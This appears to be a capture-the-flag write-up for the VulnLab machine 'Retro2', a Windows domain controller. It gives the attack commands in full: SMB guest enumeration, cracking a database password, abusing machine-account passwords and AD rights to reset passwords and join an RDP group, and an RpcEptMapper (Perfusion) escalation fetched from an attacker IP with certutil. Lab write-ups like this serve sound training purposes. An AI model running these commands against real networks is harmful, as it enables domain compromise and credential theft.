Skip to main content
Anxo Januario

Retro2

·885 words·5 mins
Easy VulnLab Windows Active Directory SMB Enumeration Guest Access BloodHound Computer Accounts RpcEptMapper
Author
Table of Contents

Enumeration
#

Nmap
#

First, a full TCP port scan was performed against the target:

sudo nmap -p- -sCV 10.10.127.218 -oA nmap/10.10.127.218-full-tcp

Nmap scan report for 10.10.127.218
Host is up (0.052s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-15 12:37:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49172/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-02-15T12:38:30
|_  start_date: 2026-02-15T12:08:27
|_clock-skew: mean: -19m59s, deviation: 34m36s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2026-02-15T13:38:33+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

The scan results identified the host as a Windows Server 2008 R2 Datacenter SP1 Domain Controller named BLN01.retro2.vl.

Key exposed services included:

  • Kerberos (88)
  • LDAP (389)
  • SMB (445)
  • RPC services
  • kpasswd (464)

The SMB OS discovery script confirmed:

  • Hostname: BLN01
  • Domain: retro2.vl
  • OS: Windows Server 2008 R2 Datacenter SP1

SMB
#

SMB shares were enumerated using guest access:

nxc smb 10.10.127.218 -u 'Guest' -p '' --shares

A share named Public was accessible with read permissions.

FootHold
#

Inside the share, a Microsoft Access database file (staff.accdb) was identified and downloaded for offline analysis.

smbclient //10.10.127.218/Public -U "Guest"

Cracking the Access Database
#

The database file was password-protected.

The password hash was extracted and then a dictionary attack was performed using John the Ripper::

office2john staff.accdb > accdbfile.hash

john --wordlist=/usr/share/wordlists/rockyou.txt accdbfile.hash

After successfully cracking the password, the database was opened and hardcoded domain credentials were found embedded on a VBA macro.

LDAP and BloodHound Enumeration
#

The recovered credentials were validated:

nxc smb 10.10.127.218 -u 'ldapreader' -p '<password>' --shares

Since the credentials were valid, Active Directory data was collected for further analysis using BloodHound.

nxc ldap 10.10.127.218 -d retro2.vl -u 'ldapreader' -p '<password>' --bloodhound --dns-server 10.10.127.218 -c All

The analysis revealed three domain computer accounts.

It was identified that the machine account FS01$ had ForceChangePassword rights over ADMWS01$.

This permission is critical because it allows resetting the target account’s password without knowledge of the current password. If access to one of the FS0X machine accounts is obtained, full control over the target machine account becomes possible.

Both FS0X machine accounts were configured with their machine names as passwords, which allowed authentication using:

nxc smb 10.10.127.218 -d retro2.vl -u 'fs01$' -p 'fs01'
Note

Before continuing with the exploitation, the following line was added to the /etc/host file.

10.10.127.218   retro2.vl BLN01.retro2.vl

The credentials were valid; however, since the account had not been used for a long time, the machine password was out of sync with the domain controller. This is typical of pre-created computer accounts.

To resolve this, the password for FS01$ was reset:

impacket-changepasswd 'retro2.vl/fs01$':'fs01'@retro2.vl -newpass Pa55w0rd -dc-ip BLN01.retro2.vl -p rpc-samr

After resetting the password, the FS01$ account was marked as Owned in BloodHound. Using the “Shortest Paths from Owned Objects” query, it was identified that:

  • FS01$ had ForceChangePassword rights over ADMWS01$.
  • ADMWS01$ had AddSelf privileges on the Services group.
  • The Services group was a member of the Remote Desktop Users group.

Using the identified privileges, the password for ADMWS01$ was reset using:

net rpc password 'ADMWS01$' Pa55w0rd -U retro2.vl/'fs01$' -S BLN01.retro2.vl

And then, using the newly compromised ADMWS01$ account, the ldapreader user was added to the Services group::

net rpc group addmem "Services" "ldapreader" -S BLN01.retro2.vl -U retro2.vl/'ADMWS01$'

# OR WITH BloodyAD
bloodyAD --host BLN01.retro2.vl -d retro2.vl -u 'ADMWS01$' -p 'Rogue1' add groupMember 'SERVICES' 'ldapreader'

Group membership was verified using:

ldapsearch -x -H ldap://10.10.127.218 \
-D "ldapreader" -w "ppYaVcB5R" \       
-b "CN=Services,CN=Users,DC=retro2,DC=vl" \   
"(objectClass=group)" member

At this stage, the ldapreader user had effective membership in the Remote Desktop Users group.

RDP access to the server was established using Remmina. The TLS security level had to be set to 0; otherwise, the connection would fail.

Privilege escalation
#

The host was running Windows Server 2008 R2, which is vulnerable to a privilege escalation vulnerability involving improper permissions on the RpcEptMapper registry key, as described in the following blog:

This vulnerability enables privilege escalation to NT AUTHORITY\SYSTEM by:

  • Manipulating the RpcEptMapper registry key
  • Triggering controlled DLL loading behavior

First, the github repository was downloaded and opened in Visual Studio.

Note

If using a Visual Studio version newer than 2019, additional packages must be installed to successfully build the project.

The project was compiled, producing Perfusion.exe.

And finally the binary was uploaded to the target and executed to spawn a SYSTEM shell session:

certutil.exe -urlcache -f http://10.8.8.46/Perfusion.exe Perfusion.exe
.\Perfusion.exe -c cmd -i